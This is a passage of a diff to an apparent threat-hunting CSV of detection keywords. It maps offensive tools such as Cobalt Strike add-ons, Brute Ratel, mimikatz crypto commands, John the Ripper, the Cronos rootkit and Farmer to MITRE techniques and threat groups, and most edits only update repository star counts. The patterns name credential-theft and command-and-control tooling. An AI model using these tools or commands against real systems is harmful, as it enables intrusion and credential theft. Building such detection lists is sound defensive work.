TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*crisis_monitor 
start*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisis_monitor stop*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisprss/PrintSpoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" -"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" -"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","742","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*crk_get_key1*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_get_key2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_max_keys_per_crypt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_methods.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline 
password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crk_password_loop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Cronos Rootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosDebugger.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*CronosRootkit.*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*CrossC2 beacon*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*crossc2 dyn load*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" 
@@ -8911,7 +9059,7 @@ "*CrossC2Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*CrossC2MemScriptEng*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Script*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","155","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z" +"*CrossLinked*","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. 
Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","915","156","2023-10-03T13:00:54Z","2019-05-16T13:36:36Z" "*CrossNet.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Cross-Site-Scripting-XSS-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" 
"*CrossTenantSynchronizationBackdoor.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" 
@@ -8923,19 +9071,19 @@ "*crunch * -o *.txt*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*crypt0p3g/bof-collection*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" -"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
